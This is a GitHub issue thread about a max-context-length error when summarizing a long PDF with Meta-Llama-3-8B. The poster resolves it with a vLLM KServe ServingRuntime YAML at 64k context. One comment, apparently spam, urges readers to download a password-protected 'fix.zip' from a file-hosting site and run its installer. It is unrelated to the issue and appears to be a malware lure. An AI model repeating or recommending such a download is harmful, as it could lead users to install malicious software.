### ISSUE TITLE
Max Context Length Error

### ISSUE THREAD

**Issue by mrhillsman** [opdev/terraform-genai-doc-summarization#1]
When attempting to verify on a substantial [PDF](https://www.arxiv.org/pdf/2408.13256) for summarization getting max tokens (8192) limit error:

```python
openai.BadRequestError: Error code: 400 - {'object': 'error', 'message': "This model's maximum context length is 8192 tokens. However, you requested 22843 tokens (22587 in the messages, 256 in the completion). Please reduce the length of the messages or completion.", 'type': 'BadRequestError', 'param': None, 'code': 400}
```

Currently the endpoint is serving [Meta-Llama-3-8B](https://huggingface.co/meta-llama/Meta-Llama-3-8B)

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrhillsman** [comment]
Was able to resolve by updating the deployed model to Llama3.2-3B and creating a vLLM model serving runtime with 64k context length.

```yaml
apiVersion: serving.kserve.io/v1alpha1
kind: ServingRuntime
metadata:
  annotations:
    opendatahub.io/recommended-accelerators: '["nvidia.com/gpu"]'
    openshift.io/display-name: vLLM 64k ServingRuntime for KServe
  labels:
    opendatahub.io/dashboard: "true"
  name: vllm-runtime-64k
spec:
  annotations:
    prometheus.io/path: /metrics
    prometheus.io/port: "8080"
  containers:
    - args:
        - --port=8080
        - --model=/mnt/models
        - --served-model-name={{.Name}}
        - --distributed-executor-backend=mp
      command:
        - python
        - -m
        - vllm.entrypoints.openai.api_server
        - --gpu-memory-utilization=0.9
        - --max-model-len=65536
      env:
        - name: HF_HOME
          value: /tmp/hf_home
      image: quay.io/modh/vllm@sha256:2e7f97b69d6e0aa7366ee6a841a7e709829136a143608bee859b1fe700c36d31
      name: kserve-container
      ports:
        - containerPort: 8080
          protocol: TCP
  multiModel: false
  supportedModelFormats:
    - autoSelect: true
      name: vLLM
```
